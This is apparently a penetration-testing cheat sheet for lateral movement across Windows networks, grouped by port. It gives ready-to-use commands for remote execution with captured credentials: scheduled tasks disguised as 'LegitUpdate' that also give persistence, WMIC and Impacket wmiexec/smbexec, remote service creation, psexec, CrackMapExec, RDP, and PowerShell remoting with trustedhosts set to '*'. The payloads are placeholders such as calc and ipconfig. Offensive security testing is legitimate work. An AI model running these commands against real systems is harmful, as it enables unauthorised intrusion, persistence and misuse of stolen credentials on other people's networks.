It’s a good idea to do a minimal port scan before anything else. Look for port 135 (DCOM), 445 (SMB), 3389 (RDP), and 5985 & 5986 (WinRM). If your Windows host is fairly modern, there’s a built-in powershell cmdlet port scanner.

Get-Content hosts.txt | % { Test-NetConnection $_ -Port 445 }

If the cmdlet isn’t available, there are plenty of scripts to use like Invoke-Portscan.

Import-Module .\Invoke-Portscan.ps1
Invoke-Portscan -Hosts HOST -Ports 135,445,3389,5985,5986

These commands can be useful with moving around the network providing you have the right credentials or privileges.

135

Create a scheduled task that would run your binary or script, can create persistence as a bonus.

schtasks /create /f /sc once /st 03:00 /tn LegitUpdate /RU System /S HOST /tr "cmd /rcalc"
at 03:00 \\HOST cmd /r "calc"

Via the built-in WMIC command.

wmic /node:HOST /user:DOMAIN\USER /password:PASSWORD process call create "C:\Windows\System32\calc.exe"

Using Impacket’s wmiexec.

proxychains4 -q wmiexec.py USER:'PASSWORD'@HOST

445

A quick check to know if you have the right privilege.

dir \\HOST\C$\

Explorer.exe can be used as a lateral movement tool providing you have the right security context.

explorer /,\\HOST\C$\Windows\System32\cmd.exe

Create and start a service remotely.

sc \\HOST create SERVICENAME binpath= "c:\windows\system32\calc.exe"
sc \\HOST start SERVICENAME

With Sysinternals.

psexec \\HOST -u DOMAIN\USER -p PASSWORD ipconfig

Using Impacket’s smbexec.

proxychains4 -q smbexec.py USER:'PASSWORD'@HOST

Using CrackMapExec.

proxychains4 -q crackmapexec smb HOST -u USER -p 'PASSWORD' -x ipconfig

3389

Window’s own remote desktop service. May not always be active but worth a check nonetheless.

C:\Windows\System32\mstsc.exe

proxychains4 -q rdesktop HOST
proxychains4 -q xfreerdp /d:DOMAIN /u:USER /p:PASSWORD /v:HOST

5985 & 5986

With PowerShell Remoting you can pass credentials and run commands in multiple computers.

Enable-PSRemoting -Force
Set-Item WSMan:localhost\client\trustedhosts -value *

$user = 'DOMAIN\USER'; $pass = 'PASSWORD'
$SecureString = ConvertTo-SecureString $pass -AsPlainText -Force
$Creds = [pscredential]::new($user,$SecureString)
Invoke-Command -Credential $Creds -ComputerName HOST -ScriptBlock {Get-ChildItem C:\}

Can be used for an interactive session as well.

Enter-PsSession -ComputerName HOST -Credential $Creds
Exit-PSSession

Via Windows Remote Management.

winrs /r:HOST /u:USER /p:PASSWORD calc